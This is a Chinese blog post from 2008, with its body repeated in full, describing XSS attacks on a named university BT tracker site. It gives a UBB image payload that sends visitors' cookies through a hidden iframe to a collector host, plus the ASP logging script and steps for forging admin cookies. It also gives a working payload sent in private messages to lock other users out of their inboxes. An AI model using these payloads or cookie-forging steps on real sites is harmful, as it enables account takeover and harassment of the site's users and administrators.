西南大学校内BT检测
利用资讯通查询机上校园网
Apr
26
西南大学校内BT的域名地址为:http://www.tvbt520.cn:6969/
先任意注册一个ID,登录后打开:http://www.tvbt520.cn:6969/my.php
在个人信息处,由于可使用UBB代码,因此我们尝试能否利用它进行跨站攻击。
在里面填入以下代码:(iframe前空格需去掉)
[img=javascript:document.write("< iframe width=0 height=0 src='http://xxx.xxx.xxx/getcookies.asp?msg='+document.cookie>;< /iframe>");]
这里,document.write();函数,可以写网页,在里面加入一个长宽都为0的隐藏iframe,其中http://xxx.xxx.xxx/是自己网站空间,getcookies.asp是一个asp脚本用于收集msg后边跟的参数,而参数我们指定的是document.cookie,也就是访问此页面用户的cookies,getcookies.asp的代码是:(%前空格需去掉)
< %
testfile=Server.MapPath("bt.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
这样所有访问者的cookie都会收集在bt.txt这个文件里,如果有管理员查看你的资料,就可以得到他的cookies,当然前提是管理员当时需连着外网,不然信息怎么发送得出去,除非你的网站是建在校园内网中的。
cookies信息为:uid=*****; pass=密码经32位某种加密算法; PHPSESSID=随机码。
这里BT网站的密码是经某种32位加密算法加密过的,我们不能直接通过盗取的密码散列值登录,但我们可以通过另一种方式:伪造cookies来伪造管理员身份进行登录。
首先还是用自己注册的ID登录,然后使用傲游的cookies编辑器(IE使用IECookiesView工具),打开BT网站的cookies信息,修改uid=和pass=成管理员用的,设定后,刷新或重新打开主页,这时,发现我们已经登录为管理员了。
但可惜啊,上面的只是理论,实际上这个办法是行不通的,原因是网站故意限制,javascript只能输入数字和小数点,当输入上面代码后,并没有任何效果,由于网站对document这些字符并未被过滤,因此我们虽不能进行跨站脚本攻击,还是可以利用它来开个小玩笑的。
在个人信息处,填入[img=javascript:alert();]或[img=javascript:document.write();],其中()中只能填数字和小数点“.”,而且小数点不能连续也不能出现在不同地方;使用alert会弹出对话框,内容为括号中的数字,如果用的是write,则会转到新的页面,里面除了数字外全是空白。
如果有人查看我们的个人资料,如我的(乱世狂人):http://www.tvbt520.cn:6969/userdetails.php?id=13716,则会出现上面效果。
可以再无耻点,给别人发个带有以上代码的消息,如:[img=javascript:document.write(1/0);],别人一旦接收,页面就会出现:Infinity(无限,表示1/0=Infinity),这样,以后它每次进收件箱,都会转到那个页面,信息也无法查看。解决办法,只有设法找到带有代码的消息的id,然后用以下链接删除它:http://www.tvbt520.cn:6969/deletemessage.php?id=*****&type=in
另外,还可以在帖子后发表评论,带上上面代码,那么这些评论谁都不能看到。
这些虽然这对服务器几乎不会造成什么影响,但如果仔细研究它的UBB代码,还很可能会发现更有用的漏洞,值得管理员注意。
乱世狂人 2008.4.26
本文仅供技术交流,谢绝一切形式的转载,希望大家理解
先任意注册一个ID,登录后打开:http://www.tvbt520.cn:6969/my.php
在个人信息处,由于可使用UBB代码,因此我们尝试能否利用它进行跨站攻击。
在里面填入以下代码:(iframe前空格需去掉)
[img=javascript:document.write("< iframe width=0 height=0 src='http://xxx.xxx.xxx/getcookies.asp?msg='+document.cookie>;< /iframe>");]
这里,document.write();函数,可以写网页,在里面加入一个长宽都为0的隐藏iframe,其中http://xxx.xxx.xxx/是自己网站空间,getcookies.asp是一个asp脚本用于收集msg后边跟的参数,而参数我们指定的是document.cookie,也就是访问此页面用户的cookies,getcookies.asp的代码是:(%前空格需去掉)
< %
testfile=Server.MapPath("bt.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
这样所有访问者的cookie都会收集在bt.txt这个文件里,如果有管理员查看你的资料,就可以得到他的cookies,当然前提是管理员当时需连着外网,不然信息怎么发送得出去,除非你的网站是建在校园内网中的。
cookies信息为:uid=*****; pass=密码经32位某种加密算法; PHPSESSID=随机码。
这里BT网站的密码是经某种32位加密算法加密过的,我们不能直接通过盗取的密码散列值登录,但我们可以通过另一种方式:伪造cookies来伪造管理员身份进行登录。
首先还是用自己注册的ID登录,然后使用傲游的cookies编辑器(IE使用IECookiesView工具),打开BT网站的cookies信息,修改uid=和pass=成管理员用的,设定后,刷新或重新打开主页,这时,发现我们已经登录为管理员了。
但可惜啊,上面的只是理论,实际上这个办法是行不通的,原因是网站故意限制,javascript只能输入数字和小数点,当输入上面代码后,并没有任何效果,由于网站对document这些字符并未被过滤,因此我们虽不能进行跨站脚本攻击,还是可以利用它来开个小玩笑的。
在个人信息处,填入[img=javascript:alert();]或[img=javascript:document.write();],其中()中只能填数字和小数点“.”,而且小数点不能连续也不能出现在不同地方;使用alert会弹出对话框,内容为括号中的数字,如果用的是write,则会转到新的页面,里面除了数字外全是空白。
如果有人查看我们的个人资料,如我的(乱世狂人):http://www.tvbt520.cn:6969/userdetails.php?id=13716,则会出现上面效果。
可以再无耻点,给别人发个带有以上代码的消息,如:[img=javascript:document.write(1/0);],别人一旦接收,页面就会出现:Infinity(无限,表示1/0=Infinity),这样,以后它每次进收件箱,都会转到那个页面,信息也无法查看。解决办法,只有设法找到带有代码的消息的id,然后用以下链接删除它:http://www.tvbt520.cn:6969/deletemessage.php?id=*****&type=in
另外,还可以在帖子后发表评论,带上上面代码,那么这些评论谁都不能看到。
这些虽然这对服务器几乎不会造成什么影响,但如果仔细研究它的UBB代码,还很可能会发现更有用的漏洞,值得管理员注意。
乱世狂人 2008.4.26
本文仅供技术交流,谢绝一切形式的转载,希望大家理解
作者:乱世狂人@乱世狂人blog
地址:http://www.tangyr.cn/read.php/99.htm
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!
原来你就是咱们西大传说中的黑客